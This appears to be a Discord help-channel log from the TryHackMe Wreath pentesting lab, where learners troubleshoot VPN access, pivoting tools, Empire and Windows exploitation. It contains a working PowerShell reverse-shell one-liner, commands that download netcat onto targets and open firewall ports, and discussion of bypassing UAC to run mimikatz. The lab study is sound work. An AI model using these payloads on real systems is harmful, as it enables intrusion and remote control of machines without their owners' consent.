#wreath-network
ok- pretty stoked I was able to 'curl' my way in to the next Task. I have a newfound respect for the curl command;) Still curious why the rev shell didn't work but in this game, if one tool won't work, another way will;). We are hackers after all- gimme a piece of gum and a paperclip... MacGyver
I wrote a pseudoshell on that one and used sshuttle and it worked
But the netcat thing looks weird, idk why it wouldn't work for you
I should write a pseudoshell for that...but I'm lazy and it wasn't strictly necessary, though probably a bit stealthier
Can u ping the web server?
check your vpn connection and also make sure the network is running
check network and vpn fine... im having same issues connecting
unable to ping webserver
having an issue with the sshuttle in task 18 and the firewall on the box, any clue how to solve ?
what's the issue?
```
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables v1.8.7 (nf_tables): CHAIN_ADD failed (No such file or directory): chain OUTPUT
# Warning: iptables-legacy tables present, use iptables-legacy to see them
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'OUTPUT', '-j', 'sshuttle-12300'] returned 1
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'PREROUTING', '-j', 'sshuttle-12300'] returned 1
fw: fatal: fw: ['iptables', '-t', 'nat', '-I', 'OUTPUT', '1', '-j', 'sshuttle-12300'] returned 4
c : fatal: cleanup: ['/usr/bin/python3', '/usr/bin/sshuttle', '--method', 'auto', '--firewall'] returned 99
```
with what command are you running sshuttle?
sshuttle -r root@10.200.80.200 --ssh-cmd "ssh -i id_rsa" 10.200.80.0/24 -x 10.200.80.200
ohh try to run the command with sudo or as root
did you need to edit your proxychains.conf for this? I can't recall which step that was required at
no
this was from the start in order to be able to access the hosts behind the webserver
If sshuttle doesn't work you can try another way to make a proxy or just do port forwarding using one of the other techniques
But you can often learn a lot by fixing a hard to fix issue
I completed it without sshuttle, that wasn't the big issue. It was the recommended way, so wanted to try that too. So now I just need to fix that issue
I can't connect to git server using remmina. Did anyone else encounter the same issue??
I started the lab network but seems the server are not fully starting. :/
I don't get ssh or even web on the prod-serv.
Hi, cannot download vpn profile to access the network, after clicking "Download My Configuration File" I get 404 (Uh-oh, this page has been lost in the matrix.)
Hey guy, I am a subscriber and I cannot see the buttons for starting the network. Also cannot ping the first machine. Any ideas? I am using the Attackbox.
Can you try to regenerate the ovpn file?
Thanks, helped.
Gave +1 Rep to @blazing rock
I have the same problem as matelko1980, but regenerating the ovpn file does not help.
Can you try regenerating it again, and redownloading the ovpn file?
I gave it another try, and waited a few minutes after regeneration before trying to download the ovpn file but I still get the same 404 error.
fwiw I had the same problem trying to download a vpn pack for Throwback the other night
same problem here... I had the .ovpn file to connect to wreath network but it gives this error "2021-04-25 01:54:52 TLS Error: TLS handshake failed" so, I tried to regenerate a new .ovpn file, it regenerates but when I want to download a "404 Uh-oh" message appears to me too.
anybody having issues with file upload to Personal-PC (task 40)?
I'm running curl http://my-ip:8081/nc.exe -o c:\\nc-NihilistPenguin.exe but it doesn't show up after I try to ls\dir the directory.
It is getting it from my http server tho:
do you have write permissions on C:\
oh, well that's a shortened example. I ran this for c:\windows\temp\...
(Answer to that is no, btw)
If you're uploading it to a directory that you can write to and it isn't working then it's getting picked up by defender
should defender be picking this obfuscated php up? I guess we gotta edit the reverse shell code ourselves so it's different from the example provided in the room?
anyways, network just reset and it works fine now, no clue what the issue was
are you using WSL2?
if so, I think there's some networking voodoo with the host windows machine that prevents sshuttle from working properly
Hey .
I'm trying to do an nmap scan on the machine but it's showing me that the host is down
Is something like adding ip route required?
Which machine?
Hello, I am trying to download the openvpn for wreath and it keeps loading to the Darth Vader - 404 Not Found page. Even after regenerating it I still get the same result.
maybe try using a different vpn region?
Different vpn region for generally connecting to tryhackme? For the wreath network there is only the 'Wreath' option to choose.
ah, my mistake then. Sorry
No worries
#announcements might help, due to the maintenance
In Access/Networks, it is written : "You don't have access to any networks". I don't get why so because I have both a paying account and a streak of more than 7. Any ideas?
Did you join the room first?
Yes and the room tells me I have 7 days left of access.
Ok, I just resolved my problem by leaving the room and joining back in ..
any help ?
hey whatsup everybody .. i am doing wreath room Task 6 Webserver Exploitation , the exploit work just fine , the problem that i can not pwn a reverse shell to my machine , everything set just fine the port and the ip but i can't get connection i was using port 1337 and did not work so i changed it to 443 in order to work but no luck .. any help please?
thank u .
Not every machine has netcat installed
Read the code -- it's near the top. Also, please don't try to ping everyone: it won't work, and makes you look really self-absorbed.
So I'm just starting with the Git Server enumeration, just so that I don't waste my time, what would be a good combo of nmap switches to use on the internal servers? Should I use the good ol -A -p- or would that be super slow?
Certainly wouldn't do -A -p-
Yeah I figured that would prob be mega slow
to start out I guess I'll just run a simple nmap with no switches
see where that takes me
I mean my standard is -p- -v -sV
If you're scanning over a pivot like SSHuttle, maybe not so great. Static nmap will be a bit better
ok then how i am going to have a reverse shell like others did if netcat was not installed already ?..how to change pty to > tty type of shell without a connection ?
Have a look at PayloadsAllTheThings on Github
There are many ways to get a reverse shell -- netcat is not a particularly good one either a lot of the time
I would also highly suggest having a look through https://tryhackme.com/room/introtoshells before carrying on here
ok THANKS a lot
Np
thanks ..but i am going to try something else than net cat
On the gitstack part I have code execution on the server but it wont execute my powershell command :/
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("IP",53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
You didn't include your IP, you aren't using a port above 10000, and you need to url encode
Well I include the IP when i'm actually doing it but why do I have to use a port above 10,000? And I didn't even think about the URL encoding part, thanks!
Oh wait, I might be mistaken. One of the shells you are supposed to due to port scanning to not throw them off
The initial network scan I did was for the top 15,000 ports.
Oh ok, I might be confused, haven't done a few parts recently.
hm even with URL encoding windows doesnt like my command.
It's just the URL encoded version of what I posted earlier with the right IP and port 12000
I presume you have a proxy setup?
Yes using sshuttle even tried it using a script to generate an encoded powershell reverse shell but it don't like me
What are you using, Curl or BurpSuite?
neither just re-running the exploit
Sorry about asking these basic questions, I promise I am not trying to be mean.
Yes, I would advise using curl or BurpSuite for the payload
The script can cause issues
ok let me try
I personally used curl however from what I have been told, both work
I can execute basic commands like 'whoami' with the burp method but it still doesn't like my powershell commands. Usually this would work I thought
Gonna try again tomorrow thx for your help though
Try curl -X POST - something to send data "PAYLOAD" url
Firewall?
Yeah that could be it will try netsh advfirewall firewall add rule name="TCP Port 4444" dir=in action=allow protocol=TCP localport=4444 or some variation
Ye, the curl method is curl -X POST -d "PAYLOAD" $ip/web/exploit-username.php
Hello, I have gotten Chisel on the Git Server, proxy all setup, everything connects. i do everything just like the video, and it returns a ERR_EMPTY_RESPONSE
Am i the only one who is having problems in installing empire on kali?
nope it's quite exhausting to say the least but apt getting powershell-empire worked fine
I'm feeling a little overwhelmed by all the different types of port forwards and proxy, which should I start out with when playing around with the practical part of the pivoting?
Sshuttle makes things easy.
If you're wanting to get into the nitty-gritty of it, I would suggest messing around with SSH tunneling though. That helps a lot with understanding
Hey, I cannot connect to the first host with SSH... I just downloaded the private key and changed its permission, but I'm still getting this error. I've checked the key and there are no spaces in it. I've also waited for the network to restart, but the error is still there. Could anyone help me?
I would change the command to this: ssh -i id_rsa root@10.200.93.299 but I am not sure if this helps
@surreal sail I assume you did chmod 600 id_rsa as well to the key?
Sure
Yeah I tried this but nothing changes
I would delete the key, and grab it again if it still doesn't work then box needs to be reset
I did this yesterday, I waited until today for the box to be reset but still getting the problem =/
I also tried to generate a key and add to authorized_keys on the box, but I don't have permission to write in this file
Is your vpn working fine? no connection errors? Is your kali box updated?
check that there's no copy-paste errors or windows-style newlines
there shouldn't be any newlines at the end either.
Maybe this is not the complete key
Yeah my VPN is fine, I connected to the box with the exploit without problems.
I'm using my Debian, but i'll check for \r\n
Hmm, I did sed -i 's/\r//' id_rsa, no results
I thought this could be the problem, but I really don't know what to do since I cannot upload my own key and the box already has been reset
Could anyone try to connect to the box with the private key? So that I can know whether the problem is here or there
Maybe the Key was new generated
Oh
I just sent the private key to my machine with /dev/tcp and it worked
Probably I was copying with some badchar
Thank you all for the support
In the end, the problem was the newline I deleted haha
im having trouble with "
What command would you use to connect back to this server with a SOCKS proxy from a compromised host, assuming your own IP is 172.16.0.200 and backgrounding the process?"
Which task is that
14
I am using kali custom image 2020.4 and cant run empire tried different things like installing pip.
but it seems that both pip2 and pip3 are installed in python3 in my distro
@deft quartz It continues from the first question if that helps at all which is a server and since this is a server/client connection that should tell you what the answer should be.
ight
i got it
good
[root@prod-serv ~]# curl 10.10.178.77:8080/nmap-y33t3rs0n -o /tmp/nmap-y33t3rs0n && chmod +x /tmp/nmap-y33t3rs0n
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:23 --:--:-- 0
should it do this?
hey sorry to bother you, I know you are super busy, any news on that?
I spoke to the last person yesterday (sorry -- took ages to get hold of them). The go-ahead for prizes has been given, but not sure if it's been seen yet
good job!
oh right wreath writeup...
Can't get starkiller working, just installed empire manually. sudo ./empire --headless & then I visit https://localhost:1337/ accept security warning and then its a blank page
try sudo ./empire --rest
also dont just go there, use starkiller
OH lol I didn't start starkiller whooops
oh yeah if anyone needs a quick command to get their tun0 ip can do ifconfig tun0 | awk '$1 == "inet" {print $2}'
gotcha
i get this error even after installing flask
check if youre using python3 or python2
is this an issue.
tried.Look
when i try to run install.sh for empire. I get this error. Package python-pip is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
However the following packages replace it:
python3-pip
E: Package 'python-m2crypto' has no installation candidate
E: Package 'python-pip' has no installation candidate
idk
Running as root might not be helping
no no you have to
tried everything nothing seems to work
when i try to install m2crypto it tells me that requirement is already satisfied
You know what would be nice is if we got 2hrs of time on the wreath network instead of 1hr so I don't have to go back and forth on the time
You can extend it
You don't have limited time on the network
I know buuut
its expensive to run so iirc its better for thm that way :)
Do they run their stuff on AWS or something?
yep
Confused on the Empire part, so for the webserver the .200 it acts as a 'jump server' for my connections to .150 so I make a listener and http_hop listener for .200. Transfer the files to the webserver. Serve them up on the php server thing. Then on the gitserver .200 I use the exploit for gitstack to execute my url encoded powershell stager payload. Except I don't get an agent back. And I did open up the ports on .200 & .150
keep trying, but if it doesnt work and you tried everything you can skip the empire part.
Just completed this room. Learned a lot! Thanks @merry robin
Gave +1 Rep to @merry robin
hi
Hai
Hi guys!
.200 working for you?
I am unable to get the ping back! I have tried to reconnect the VPN but still not working
sudo apt install powershell-empire
install via this, it will satisfy all the requirements
Hi everyone! On task 36 personal PC Exploit Poc I'm able to go to the website IP .100 but when I try to go to the /resources folder it keeps loading without showing me the authentication required.... Am I missing something?
I'm able to ping it
There are many different instances of the wreath network. The third octet of the IP shows which instance you are on. If you can't ping or connect to the network, double-check to make sure the network is running.
Also make sure you're on the Wreath specific VPN
Already tried everything... I'm unable to get to /resources....Network running, website available but not the resources folder...
ok...stupid me...I forget to turn on foxyproxy...
That network provides insane learning points to beginners, props to those that created it, it was a very lucrative room
Aha, this one was my baby.
You are most welcome @thorny arch
why does it show that i have only one day of access left to the wreath network?
@sweet rune you can only be in the wreath room for 10 days. After that you have to rejoin it, and the network won't be the same as you left it - you'll have to exploit again etc.
thank you
Yeah man, I'm learning so much with all this, this will be extremely useful
I just finished it. I wanted to thank you for all the knowledge that you provided me with this network.
Gave +1 Rep to @merry robin
hie guys i have been failing to access the webserver,when trying to connect via ssh my machine is saying no route to host
[+] Stable internet connection
[+] OpenVPN is installed
[+] tun0 exists
[+] tun0 IP is in the correct range
[+] Only one instance of OpenVPN is running
[+] Confirming connectivity
[-] Something went wrong -- please ask for further assistance in the TryHackMe Discord server, subreddit, or forum
First thing that comes to mind is that you might not be on the "Wreath" vpn. It's a separate vpn file that you have to download and execute. Second thing is making sure that the network is up.
i am currently connected but i don't know were am getting it wrong
And the network is running? are you able to ping or nmap the .200 machine?
getting the same error as Guveya now
Network is running, openVPN access shows i'm connected to Wreath Network. unable to ping .200 machine
can't connect either from my linux or attackbox
this might be signal for us to stay away from our computers during the weekend and enjoy air outside
I'm in the same network; cannot reach it either
Ummm i need to close the network
But
There seems no way
Should i leave it be
Its got around 1.25 hrs left on it.
lol
If this is all the same subnet, try to go for a reset. Chances are someone shut a box down manually
It's working fine for me now, wasn't reset
my vpn file didnt work and cannot regenerate a new one
Are you still joined in the Wreath room?
i just returned to the room today
Remember there's a 10 day limit on it, so you may need to rejoin
I've rejoined it for 5 hours and it still not work, pls help
thanks man it worked!
Gave +1 Rep to @half spoke
Hi guys, i am doing Task 20 Git Server Exploitation. I want to setup the "socat relay from .150 thru .200 to my attacking linux". got difficulties, can't see any response after i send POST request from burp. Need support please
@kind parrot WSL doesn't play nice with networking, so that might have something to do with it. Also check the firewall on 200. If you can netcat from your host to 10.200.84.200:15100 then you know that bit is fine
It means you have 3 days of access left
Check the pins :)
yes I did with netcat and it works, only socat relay i had a little bit of an issue. maybe need more time to figure it out
Hey all.. I was wondering if anyone was able to run mimikatz on git-serv without RDP? I was trying to complete this task with use of only terminal. I tried uploading an Msfvenom and relay my rev shell through socat which went fine but couldn't bypass UAC to run mimikatz, also tried a few powershell privesc techniques but no success
Really just wondering if anyone was able to do this?
I don't think it's really possible to run mimikatz through a non-rdp session (I could be wrong). Although you can run most of mimikatz through a meterpreter shell.
I'm thinking you might be right.. I tried the kiwi module aka mimikatz with metasploit but same result because I couldn't bypass UAC
Did you try invoking incognito?
yeah went through a few option.. getsystem, incognito used some powersploit modules but nothing
currently trying this technique but used a msfvenom dll https://www.bleepingcomputer.com/news/security/bypassing-windows-10-uac-with-mock-folders-and-dll-hijacking/
Wreath Network
I need help In wreath task 5 I am not able to access the website when I am typing the IP address of the machine
/hacking
??
xd
Configuration File cant be downloaded even after Regen ?
probably the firewall, socat works fine on WSL2
did you add the appropriate iptables rules on incoming for the prod-serv?
memory serves it's running a centos, so you should use firewall-cmd
you can probably run it through evil-winrm but it's a bit of a mess
are you using the proper vpn config? it's a separate one for Wreath
yes i did it.
Yup I have downloaded and config the proper vpn and I am also able to ping that server
It may be wanting you to set a host
I've been trying to download the vpn for wreath but its redirecting to error page
I tried to regenerate it too but it's still redirecting to error page
Any idea what to do?
I downloaded yesterday without problems.
but it might be a system glitch right now. I have had a few times with timeout from the site today
anyone free to help me with a chisel forward proxy?
think im missing something here
lol nevermind just read the hint
doh
I tried with Evil-WinRM with no luck... you can run mimikatz but not with admin due to UAC which is what I'm trying to figure out a way to bypass. If I figure it out I'll drop some hints here
let me check my notes
yeah if you have any ideas that be great
ah yeah you need RDP as you need the admin shell
Indeed.. but that said I'm just not the type to give up trying to find an alternative easily, I feel there must be some method to bypass uac
get a shell as NT Authority/System
thats's the hope... wish me luck lol
finally got it! required multiple socat relays to relay multiple metasploit sessions
Am I allowed to divulge the method I used to run mimikatz without RDP here?
Is there a certificate given for Wreath Network? Or only a badge?
only a badge
Go for it
Metasploit (or another C2) would be the way to do it
I'll export my cherry tree node to PDF and put it on github rather than writing another novel in the server and anyone who wants to can check it out there
With your report written and proof-read, you send the PDF to Thomas then sit back and relax, your work is done!
Ok thanks
Gave +1 Rep to @pallid vapor
what a super cool room!
here's a link to the "No RDP" method I used to get mimikatz to work... It is in no way a detailed write-up though https://github.com/UbuntuStrike/Write-ups/blob/master/wreath_mimikatz_no_RDP.pdf
Its only that section btw, not full writeup on the room
cool :)
Someone who can help me with task 40, I am having trouble receiving the revshell, I can upload netcat but I am not getting a reverse shell ..
any errors?
Nop, it just does not give me the connection, I can upload the webshell, netcat without problems, but the revshell does not work
which machine did you upload it to?
In the last machine in the av evasion section
.200? .150?
100
my first guess, from looking at my notes, is that maybe you didn't compile the nc binary correctly
Fixed, in the end it was a problem with the proxy, thanks for trying to help me
Gave +1 Rep to @dry pendant
You're welcome. Glad you got it fixed, sorry I wasn't helpful
What matters is also the intention, so again, thanks xD !!
Can someone help me with this I'm still not able download it
from pinned msg,
You can rejoin at any time though, and your progress in the room isn't reset. You also shouldn't need a streak/sub to rejoin once you've been in there once; but you will need to redownload the VPN connection pack
My 10 days of access ended but I am unable to download new vpn connection from access page. I am getting You don't have access to any networks. Is the streak/sub mandatory now?
hey im on task 30 and i was trying to experiment with the different modules using empire's framework cli. It says that my agent ran the script but i don't know where to actually find the output. The script in the example gave the output directly to me but winPEAS doesn't.
I have finally finished the Wreath room, everything that this room has taught me has been incredible, thank you @merry robin for creating this room it has been an incredible experience!
Gave +1 Rep to @merry robin
So when will the winning reports for Wreath be announced or featured on the site? @merry robin
Very soon
Winners should already have been contacted. I'm going to announce them at the same time as the YotJF winners
( this might be a stupid question. apologies in advance ) while doing wreath ( Task 17 git server enumeration ) I got a some extra ports open, which doesn't seem to be the case in most writeups and the walk-through by dark. don't really know why?
Nmap scan report for ip-10-200-86-150.eu-west-1.compute.internal (10.200.86.150)
Host is up (0.00054s latency).
Not shown: 6144 filtered ports
PORT STATE SERVICE
80/tcp open http
135/tcp open epmap
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
MAC Address: 02:4D:36:4B:4F:07 (Unknown)
That's weird, when I did the nmap it didn't report 135
is it because some one was running SMB? that's all I could get from the port numbers.
it's possible someone could have disabled the firewall(?)
so everyone remembers, DO NOT open such low ports, use ports from 15000 onwards, for everyone's sake, also remember to close the smb service when you are no longer using it
15,000
hey @merry robin I submitted a PDF writeup for this, but I was wondering if you would mind me making a kind of 'attack narrative' only one for my own hosting?
just because the network used a lot of techniques I'd like to showcase if i ever put my github pages on my linked in
Aye, of course
cool! thanks
Mb srry xD
Hey!
If you have a Wreath VPN configuration 404 issue upon download could you ping/ DM me.
Hello,
For task 13 (socat) the example uses netcat (the version with -e). I'm sorry if I missed it but where's the link to download the static binary for that ?
(please ping me)
Hi, anyone else having problems with connecting to network? It went to sleep and i booted it back again but now i cannot connect to anything. Am i doing something wrong?
Hej Ma'vio, I have the same issue too. I have tried to regenerate the network config file but to no avail.
Thank you Muiri
Np!
Hello @cyan vine ,
I have a Wreath VPN configuration 404 issue upon download, could you help me ?
Just passing this onto the site staff :)
thanks
Gave +1 Rep to @cyan vine
Please no admin pings ❤️
With that, please regenerate it once more
You might have to log out and log back in
i've done that
i've done that too
still
its down
cant download
Then please email support@tryhackme.com
You have to give it a few seconds between clicking the regenerate button and attempting to download it
yea i ve been trying since past 1 hour
and its like.. uk.. making me mad
so
naa
nvm
Please email support, I understand your frustration but the admin pings were entirely unnecessary
guys .....
restart your vpn and check network is up
already done 3 times
Someone fucked it up
I'm from the attack box, which always works... Not this time
theres different instances of the network...
so one person cant mess up the whole thing
try a reset
All instances have the same IP?
no
Cuz I have the same one as the screenshot above
10.200.84.200
I voted to reset the network
join room button showed up again after some time and now I am able to download new config. not sure what was the issue but it got resolved automatically
Hello everybody. Sorry to bother u but I have this little issue with port scanning the last machine of the network
I launch this command: Evil-WinRM PS C:\Users\Administrator\Documents> Invoke-Portscan -Hosts 100.200.87.100 -TopPorts 50
and I get:
Hostname : 100.200.87.100
alive : False
openPorts : {}
closedPorts : {}
filteredPorts : {}
finishTime : 5/8/2021 10:36:56 AM
any idea why?
Evil-WinRM PS C:\Users\Administrator\Documents> arp -a
Interface: 10.200.87.150 --- 0xa
Internet Address Physical Address Type
10.200.87.1 02-76-be-e3-c3-c1 dynamic
10.200.87.100 02-52-59-7f-a0-01 dynamic
10.200.87.200 02-ab-08-16-2c-5b dynamic
10.200.87.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.251 01-00-5e-00-00-fb static
224.0.0.252 01-00-5e-00-00-fc static
255.255.255.255 ff-ff-ff-ff-ff-ff static
Error is here: 100.200.87.100
Compare your command with the result of arp -a
Omg u are right!! I promised u I also double checked the code
Maybe I was tired!! Thank you so much
No problem, I was stuck for 20 minutes yesterday because I forgot to start sshuttle again
hi someone know if the wreath lab finish in 6 days? appear me 6 days of access left
later will be paid?
Nope, you only have a certain amount of days in the room, before it expires. Once it expires, all you have to do is rejoin the room, sadly it will clear all your progress.
It won't clear your progress, check the pins
By progress, I was meaning your progress on the servers, for instance, pre set binaries, workers, etc.
Oh didn't think about that
Only because you get put on a different subnet.
wth for 1 hr i was thinking git server machine was a linux system
hello everyone, i have an issue in Task 32
the session is created but i can't connect to the server
i tried with Foxyproxy and Proxychains but none worked
[proxychains] Strict chain ... 127.0.0.1:9050 ... 10.200.88.100:80 <--socket error or timeout!
curl: (7) Couldn't connect to server
I think there is a problem with that host
Evil-WinRM PS C:\Users\Administrator\Documents> Invoke-Portscan -Hosts 10.200.88.100 -TopPorts 50
Hostname : 10.200.88.100
alive : False
openPorts : {}
closedPorts : {}
filteredPorts : {}
finishTime : 5/9/2021 3:00:44 PM
Interface: 10.200.88.150 --- 0xe
10.200.88.1 02-56-a3-18-e9-ef dynamic
10.200.88.100 02-46-02-ae-ed-03 dynamic
Go for a reset. Looks like someone shut it down
@merry robin on your opinion who make the best pentest report from wreath?
I really need to announce the winners. They should all have been notified -- just waiting for the YotJF results too
Just wanna know which one is the best to emulate
Still need to write mine :(
I'm addicted to socat now, all thanks to muiri
Socat is great
Socat is wonderful
Bow before socat!
What octet?
10.200.86.x
It did get reset yesterday.
Lmao
Hey guys, I'm at task 34 but the download rate is really really slow. It's been almost one hour and I downloaded only 2 folders. Any tips?
So, I finished Wreath recently. And before going after Throwback I'd like to make sure everything is clear in my mind. I made this (ugly) draft of how things go networking wise could anyone tell me that this is correct ?
It's only a draft on MSPaint, I'll make it clean and beautiful with Visio
ughhhhhh
I think you're kind of over complicating it
I mean if it helps you it helps you but that seems like it would just confuse you more
I mean I develop networks and that confuses me
Did you figure this out? I may have been spraying the admin login page and lock things up. I'm not sure what to do now
I think I figured it out - the ip changed after the initial enumeration
The IP shouldn't change, unless you downloaded a new vpn config.
I'm having issues getting the http_hop to work
running the generated payload doesn't work
i even tried running it directly on the gitserver shell
I get all bunch of errors
mainly RemoteException
- FullyQualifiedErrorId : NativeCommandError
i'm tryna transfer my private key over to the target on task 11
i can connect via ssh, however when i try to scp i get permission denied?
ffs nvm
moving the flag before my file works
Hey, is there anyway that I can increase the wreath network access time?
leave and rejoin
before the time is over? or after the days left for me in the room?
It says I have 1 day left
but I moved slow due to streaming it on twitch almost daily... And I have 1 day left for AV and further task
You just need to rejoin once your time expires
sure thing. Ohh btw, will it reset my progress? I guess no?
It'll likely be a new network, but your answers won't change
ohh alright... thanks π
itll be the equivalent of resetting it basically
Hi in Task 18 Pivoting I use: sshuttle -r root@10.200.86.200 --ssh-cmd "ssh -i sshkey" 10.200.86.0/24 -x 10.200.86.200 and it says connected, but I dont get a connection to 10.200.86.150 over sshuttle. When I ssh into the machine it works
but I dont get a connection to 10.200.86.150 over sshuttle What are you trying to do with 10.200.86.150 ?
Have you tried opening http://10.200.86.150 in a web browser ?
I tried to make service detection with nmap
Well when u used that command above.... you got into the network as prod-serv... If u try to run nmap on ur attacker machine... It is going to be slow... But will allow u to scan .150
Sshuttle will allow u to connect to .200 and access .150 as server for || gitstack|| but does not give u shell access on .150
For that u need to retrieve password hash of a user residing on gitsever.thm and then connect via either RDP or evil-winrm
@trim sentinel well on 150 machine it is better to use ||evil win-rm|| but even before that you have to find the creds and do some stuff with the firewall
@merry robin thx man for this awesome network really cleared many concepts
thx got it now
I installed starkiller and empire as it is from the official walkthrough but when I ran starkiller I have no listener types available.
thanks in advance
@open nebula check whether empire is showing some error code; personally it's better to use pwncat and upload scripts by yourself
pwncat! :))
Hi guys, I have some problems reaching /resources in Task 36. I can reach the page directly with the ip.100 but can't get further. I am using sshuttle to the prod-serv and go with evil-winrm into the git-serv to start the chisel server with socks5 and with the firewall port I opened on the git-serv. My chisel client locally is working fine and connecting to the chisel server on the git-serv. FoxyProxy is active in chrome and firefox, set as my chisel listening port to socks5. As mentioned, I can reach the Main Page, and when navigating to /resources I get the Login prompt. After typing in my previously found credentials it seems to be loading but won't connect me to the page. Any ideas?
Make sure your proxy in firefox is configured as a socks proxy, not http. That's my first guess without going back and re-reading my notes.
thanks for the fast reply, that's the case in both firefox and chromium, furthermore wouldn't I don't even get the login prompt then?
I re-read that, that makes not that much sense, let me rephrase it. Shouldn't I then not get the login prompt at all?
Good point. Yeah, without re-reading the room and my notes, I am not sure offhand. Sorry
np thanks for the idea
you're welcome
Maybe anyone else got an idea or maybe ran into the same issue?
Make sure you have the correct creds
Thanks for the reply Muiri, if I understand it correctly it should be the credentials of Task 21 which I tried, using the user found (Txxxxx) and as the password the cracked NTLM Hash of this user. Unfortunately up till now this has not worked for me.
It should be. Yes.
That's odd -- it's got to be something to do with the proxy, if it isn't loading at all. Check to make sure it's a socks5 proxy on the right port
Well that's the odd thing, the main page loads correctly, and navigating to /resources triggers the login prompt, Chisel server is active through Evil-winRM set as socks5 with the opened Firewall Port, chisel client locally as socks listening to the opened Port and forwarding it to my local port and my FoxyProxy in FireFox or Chrome is set to Socks5 with the corresponding local port configured in chisel client.
That all sounds correct. Very strange
I think so as well, as I am out of ideas now I will try to access /resources on another client with a bare metal install of kali maybe something in my Main OS blocks my VM from accessing resources. I can't imagine that it does, as everything should be set up to not interfere,
but well I am at my wits' end here
Well, that doesn't seem to work as well, tried different chisel versions, different ports as well as a different client with a bare metal install of kali linux still the same problem after the login prompt, it just dies on me while pretending to load /resources, even deleted my firewall rule and added it anew.
this room is not working for me =/
Muiri
I just finished your room
very nice
uploadvulns
thanks
ok I cant do anything in this room, how can I reset it?
.<
for wreath, you share it with other users, so you have to vote for a reset (at the top of the page). Once there are enough votes, it will be reset to a clean state
ok
i f'ed up
i tried to connect with an ssh key with bad permissions and got myself banned
is there anything i can do?
There isn't anything in place to ban you
muiri
thanks
but... why isnt it working then?
i got the key
ssh -i key root@IP
Permission denied (publickey,gssapi-keyex,gssapi-with-mi
Sounds like a formatting error -- or someone messed with the key
I don't have my Kali active to check
Well, chmod 600 it
it doesnt lemme in even after that T_T
never heard of pwncat will do some research on it.
@open nebula check this out https://www.youtube.com/watch?v=CISzI9klRkw
sudo ssh.........
Thanks again for the support Muiri, I don't know why and how, but after 2 days banging my head against the wall it just works like a charm. Didn't change a single thing. Kudos and thanks for the great room, really appreciated
How do I install modules for python2 on my kali vm? I'm trying to run the exploit that was shown in task 19, and I get the following error
Traceback (most recent call last):
File "exploit-An00bRektn.py", line 17, in <module>
import requests
ImportError: No module named requests
I'm not sure how to specify the version. The man pages tell me to use pip instead of pip3, but both are defaulting to requests in python3
nvm just saw the pinned messages, I think I can figure it out on my own
Yeah even for me with the bot copied keys it says the same did chmod 600 to all the files
did you copy the public key to your machine? You're supposed to use the private key to connect.
I copy all of them
pub to pub, private to private since the private key gave the same error
After that removed every ssh file from my kali generated them again deleted the copied key called it root_key chmod 600 still "root@10.200.90.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic)."
@worn zenith you sure you have the root pub key?
Hey guys I'm on the Empire section of wreath network, I'm having some problems in getting an agent in task gitserver! These are my ss
I also tried this with curl but the problem is same!
I think that the problem is in here!
If anyone is able to help me pls see to it!
you're listening on 6000 yet it's pinging back on 7000
doesn't look like it's grabbing the right listener
I think someone patched the webserver...
Yes I got it solved now thanks for help to!
If you want to use ip you need -- prior, if you want to use - you need i
You mixed it up
Try the evilwinrm help for additional info
yeah it's -i not -ip
thank you
But my http-hop listener is on 6000
What about this error?
there's nothing listening on 7000 on that server
What do u mean??
your php server is listening on 6000
Yes
why is it looking for stuff on 7000?
Where is it saying that it is looking for 7000?
check your conf for the hop listener
Got it boss!!
One of the best tips generally speaking
Why doesnt id_rsa work when copied with CTRL+C && CTRL+V
md5sum shows different numbers,also
it just isnt the same file
any ideas?
If I understood you correctly, you try to mark a terminal line and ctrl+c it?
you cant CTRL+C && CTRL+V
No, im copying the id_rsa from the server, pasting it into my own machine and it doesnt work
and from where (shell, rdp) ?
yes thats what I thought
the link I shared tells you this
try it out with copy some marked line in the shell and ctr + v it into an editor of your choosing
see what you get
you need to CTRL+SHIFT+C
this is what i ve been doing, man
my guess is that the file isn't copied correctly even if it is the same
.
check if the output is the same you have the file locally and on the server
check that line endings are LF and not CRLF, as well
it is
chmod is set?
yes
i have no idea how to check that
is there a way to just transfer the file?
i tried scp, simplehttpserver, simple.http, curl, everything
hrmm I would simply remove the file and copy it anew check to make sure that you dont get any random chars or empty lines from copying
i am done for today with this room i will try again tomorrow if it doesnt work i will quit it
a ctrl c defeats me
For task 21, I created the user and confirmed that the user is in admin and remote management users group. But when I tried to connect from my attacking machine to the .150 host via evil-winrm and xfreerdp, both seems to be failing. The error shows connection timeout
Anyone can help? Can I not connect directly from my attacker machine to the .150 host?
I just did that, and still failing
Mind if I DM you?
Aight, np
you can post here though
Oh I can? Thought I shouldn't lol
this is the help channel for wreath
you'll have to proxy through the web server
So I setup my proxy using ssh -D 1337 root@10.200.93.200 -fN -i id_rsa
Then attempt to evil-winrm into .150 host using evil-winrm -u user -p pass -i 10.200.93.150
Still not working hmm
try sshuttle or chisel
you may need to pop a hole in the firewall
and you'll need to setup proxychains if you use chisel
read the course material, it'll help you get started
notably the section on pivoting
oops
seems like im no longer able to access the prod-serv (first machine) after i tried to socat
Hello!
I'm stuck at the pivoting part to server3.
I open the port in firewall
Open chisel as server running the open port
And after that open chisel as client in my kali machine on the port 9090
Configure the foxyproxy(proxy 127.0.0.1:9090), and it's not working ...
I don't know what I'm doing wrong
Solved ^^
